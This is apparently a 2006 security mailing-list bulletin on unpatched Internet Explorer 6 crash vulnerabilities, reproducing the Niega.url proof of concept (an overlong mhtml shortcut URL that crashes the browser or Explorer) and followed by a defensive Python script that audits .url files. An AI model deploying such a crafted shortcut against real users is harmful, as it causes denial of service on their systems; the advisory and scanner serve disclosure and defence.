Subject: [Boletin-RTM] Vulnerabilities
Date: June 1, 2006 21:14:21 (+0200)
Author: OpTix <optix @........org>

Several new vulnerabilities have been announced in Internet Explorer 6 that can crash Microsoft's popular browser.

The first problem is a null pointer dereference: the browser crashes when it tries to read the value that a null pointer points to. When an empty applet tag is created before any other HTML tag, Internet Explorer ends up with a null pointer without ever closing the tag, which causes the crash.

A second problem has also been announced, which shows up when the browser enters an infinite loop. This causes Internet Explorer to close and display a misleading "unknown software exception" error. Finally, a denial-of-service problem has been announced, triggered when a frame is created under certain conditions and the user clicks within that frame's area.

Proofs of concept have been published for all of the problems described, and so far no definitive solution has been provided.

------------------------------Niega.url-------------------------------
[DEFAULT]
BASEURL=
[InternetShortcut]
URL=mhtml://mid:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA
/*
*
* Internet Explorer overflow Vulnerbility [Proof of concept]
* Bug discovered by Mr.Niega
* http://www.swerat.com/
*
* Affected Software: Microsoft Internet Explorer 6.x
* Severity: Unknown
* Impact: Crash
* Solution Status: Unpatched
*
* E-Mail: Mr.Niega (at) gmail (dot) com [email concealed]
* Credits goes out to MarjinZ and Andvare
*
* Note: By right clicking on the file explorer will crash
* Note: del=crash,F2=crash Use cmd to delete file
*/
------------------------------Niega.url-------------------------------

More information: http://www.securityfocus.com/bid/18198

Greetings to the authorities; the site will be back online soon... once again.
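
As a defensive complement to the Niega.url sample above, the following added example (not part of the original bulletin or of the published proof of concept) audits `.url` shortcut files before they reach users, flagging a `URL` value with an unexpected scheme, excessive length or a long single-character run. The thresholds, the scheme allowlist and the function names are assumptions.

```python
import re

# Assumed policy values (not from the original bulletin); tune per environment.
MAX_URL_LEN = 2048                      # longest URL value accepted
MAX_CHAR_RUN = 64                       # longest run of one repeated character
ALLOWED_SCHEMES = {"http", "https", "ftp"}

def parse_shortcut(text):
    """Parse INI-style .url content into {section: {key: value}} (lowercased names)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].lower(), {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            current[key.strip().lower()] = value.strip()
    return sections

def audit_shortcut(text):
    """Return a list of findings for the URL key of [InternetShortcut]."""
    url = parse_shortcut(text).get("internetshortcut", {}).get("url")
    if url is None:
        return ["no URL key in [InternetShortcut]"]
    findings = []
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", url)
    scheme = m.group(1).lower() if m else ""
    if scheme not in ALLOWED_SCHEMES:
        findings.append(f"scheme {scheme or '<none>'!r} not in allowlist")
    if len(url) > MAX_URL_LEN:
        findings.append(f"URL length {len(url)} exceeds {MAX_URL_LEN}")
    if re.search(r"(.)\1{%d,}" % MAX_CHAR_RUN, url):
        findings.append(f"run of more than {MAX_CHAR_RUN} identical characters")
    return findings

# Constructed samples: the second mirrors the layout of the Niega.url file
# shown above, with the filler generated here rather than copied.
BENIGN = "[InternetShortcut]\nURL=https://example.com/\n"
SUSPECT = "[DEFAULT]\nBASEURL=\n[InternetShortcut]\nURL=mhtml://mid:" + "A" * 3000 + "\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, audit_shortcut(sample))
```

Run over a mail gateway's attachment quarantine or a file share, an empty result means the shortcut passed all three checks; any finding is a reason to hold the file for review.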